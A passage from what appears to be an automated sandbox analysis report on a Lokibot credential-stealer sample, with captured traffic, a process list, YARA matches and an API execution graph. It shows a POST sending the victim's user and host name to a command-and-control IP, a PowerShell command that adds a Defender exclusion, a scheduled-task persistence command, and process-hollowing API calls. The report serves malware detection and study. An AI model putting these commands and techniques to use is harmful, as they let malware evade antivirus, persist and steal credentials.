                                              Apr 26, 2024 04:57:30.711704969 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:30.711745977 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:30.711783886 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 26, 2024 04:57:30.879601955 CEST1289INData Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 0a
                                              Data Ascii: <style id='wp-block-site-title-inline-css'>.wp-block-site-title a{color:inherit}</style><style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;
                                              Apr 26, 2024 04:57:30.899617910 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:29 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.44975845.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:31.331813097 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:31.520076036 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:32.388147116 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:31 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:32.388205051 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:32.388237953 CEST11INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09
                                              Data Ascii: UTF-8" />
                                              Apr 26, 2024 04:57:32.388273001 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:32.396579981 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:32.396946907 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:32.397033930 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:32.397167921 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:32.397382975 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:32.397422075 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:04:57:03
                                              Start date:26/04/2024
                                              Path:C:\Users\user\Desktop\gunzipped.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\gunzipped.exe"
                                              Imagebase:0x8d0000
                                              File size:705'032 bytes
                                              MD5 hash:4B905E6548F4D5040FAB8962CB71877E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1735179615.0000000003D49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1739547290.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:04:57:05
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
                                              Imagebase:0x40000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:04:57:05
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:04:57:05
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp"
                                              Imagebase:0x2b0000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:04:57:05
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:04:57:05
                                              Start date:26/04/2024
                                              Path:C:\Users\user\Desktop\gunzipped.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\gunzipped.exe"
                                              Imagebase:0x3f0000
                                              File size:705'032 bytes
                                              MD5 hash:4B905E6548F4D5040FAB8962CB71877E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:04:57:05
                                              Start date:26/04/2024
                                              Path:C:\Users\user\Desktop\gunzipped.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\gunzipped.exe"
                                              Imagebase:0x400000
                                              File size:705'032 bytes
                                              MD5 hash:4B905E6548F4D5040FAB8962CB71877E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000007.00000002.1966713417.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:04:57:06
                                              Start date:26/04/2024
                                              Path:C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                                              Imagebase:0x9c0000
                                              File size:705'032 bytes
                                              MD5 hash:4B905E6548F4D5040FAB8962CB71877E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 18%, ReversingLabs
                                              • Detection: 32%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:04:57:06
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff693ab0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:04:57:08
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp"
                                              Imagebase:0x2b0000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:04:57:08
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:04:57:08
                                              Start date:26/04/2024
                                              Path:C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
                                              Imagebase:0x460000
                                              File size:705'032 bytes
                                              MD5 hash:4B905E6548F4D5040FAB8962CB71877E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:04:57:08
                                              Start date:26/04/2024
                                              Path:C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
                                              Imagebase:0xba0000
                                              File size:705'032 bytes
                                              MD5 hash:4B905E6548F4D5040FAB8962CB71877E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Loki_1, Description: Loki Payload, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:9.2%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:3.1%
                                                Total number of Nodes:96
                                                Total number of Limit Nodes:4
                                                execution_graph 36134 772fa30 36135 772fa70 NtUnmapViewOfSection 36134->36135 36137 772faa4 36135->36137 36138 fad378 36139 fad3be GetCurrentProcess 36138->36139 36141 fad409 36139->36141 36142 fad410 GetCurrentThread 36139->36142 36141->36142 36143 fad44d GetCurrentProcess 36142->36143 36145 fad446 36142->36145 36144 fad483 GetCurrentThreadId 36143->36144 36147 fad4dc 36144->36147 36145->36143 36148 fa4668 36149 fa4672 36148->36149 36153 fa4758 36148->36153 36158 fa4204 36149->36158 36151 fa468d 36154 fa477d 36153->36154 36162 fa4868 36154->36162 36166 fa4859 36154->36166 36159 fa420f 36158->36159 36174 fa5c4c 36159->36174 36161 fa6f8d 36161->36151 36164 fa488f 36162->36164 36163 fa496c 36163->36163 36164->36163 36170 fa44e4 36164->36170 36168 fa488f 36166->36168 36167 fa496c 36167->36167 36168->36167 36169 fa44e4 CreateActCtxA 36168->36169 36169->36167 36171 fa58f8 CreateActCtxA 36170->36171 36173 fa59bb 36171->36173 36175 fa5c57 36174->36175 36178 fa5c6c 36175->36178 36177 fa702d 36177->36161 36179 fa5c77 36178->36179 36182 fa5c9c 36179->36182 36181 fa7102 36181->36177 36183 fa5ca7 36182->36183 36186 fa5ccc 36183->36186 36185 fa7205 36185->36181 36187 fa5cd7 36186->36187 36188 fa850b 36187->36188 36190 faabb8 36187->36190 36188->36185 36194 faabdf 36190->36194 36198 faabf0 36190->36198 36191 faabce 36191->36188 36195 faabf0 36194->36195 36201 faace8 36195->36201 36196 faabff 36196->36191 36200 faace8 2 API calls 36198->36200 36199 faabff 36199->36191 36200->36199 36202 faacf9 36201->36202 36203 faad1c 36201->36203 36202->36203 36209 faaf80 36202->36209 36213 faaf7b 36202->36213 36203->36196 36204 faad14 36204->36203 36205 faaf20 GetModuleHandleW 36204->36205 36206 faaf4d 36205->36206 36206->36196 36211 faaf94 36209->36211 36210 faafb9 36210->36204 36211->36210 36217 faa0a8 36211->36217 36214 faaf94 36213->36214 36215 faafb9 36214->36215 36216 faa0a8 LoadLibraryExW 36214->36216 36215->36204 36216->36215 36218 fab160 LoadLibraryExW 36217->36218 36220 fab1d9 36218->36220 36220->36210 36221 772f7a0 36222 772f7e0 VirtualAllocEx 36221->36222 36224 772f81d 36222->36224 36225 772f860 36226 772f8a8 WriteProcessMemory 36225->36226 36228 772f8ff 36226->36228 36245 772f950 36246 772f99b ReadProcessMemory 36245->36246 36248 772f9df 36246->36248 36229 face60 36231 face6d 36229->36231 36230 facea7 36231->36230 36233 fab6c0 36231->36233 36234 fab6cb 36233->36234 36235 fadbb8 36234->36235 36237 facfc4 36234->36237 36238 facfcf 36237->36238 36239 fa5ccc 2 API calls 36238->36239 36240 fadc27 36239->36240 36240->36235 36241 772fae8 36242 772fb71 36241->36242 36242->36242 36243 772fcd6 CreateProcessA 36242->36243 36244 772fd33 36243->36244 36244->36244 36249 772f618 36250 772f658 ResumeThread 36249->36250 36252 772f689 36250->36252 36253 fad5c0 DuplicateHandle 36254 fad656 36253->36254 36255 772f6c8 36256 772f70d Wow64SetThreadContext 36255->36256 36258 772f755 36256->36258

                                                Executed Functions

                                                Function 0772FA28 Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 0772FA95
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: SectionUnmapView
                                                • String ID:
                                                • API String ID: 498011366-0
                                                • Opcode ID: 26fd7d3fe5a9e7be214addfdc0c629870d676b7befe573392bc59904d8ceaba8
                                                • Instruction ID: 4936c2732e75e067b8334c3fc782b04141401a03615a262a45862d41fa555158
                                                • Opcode Fuzzy Hash: 26fd7d3fe5a9e7be214addfdc0c629870d676b7befe573392bc59904d8ceaba8
                                                • Instruction Fuzzy Hash: 191149B29002598FCB20DFAAC8457DEFFF5EF89324F108829D459A7250CB35A945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772FA30 Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 0772FA95
                                                Memory Dump Source
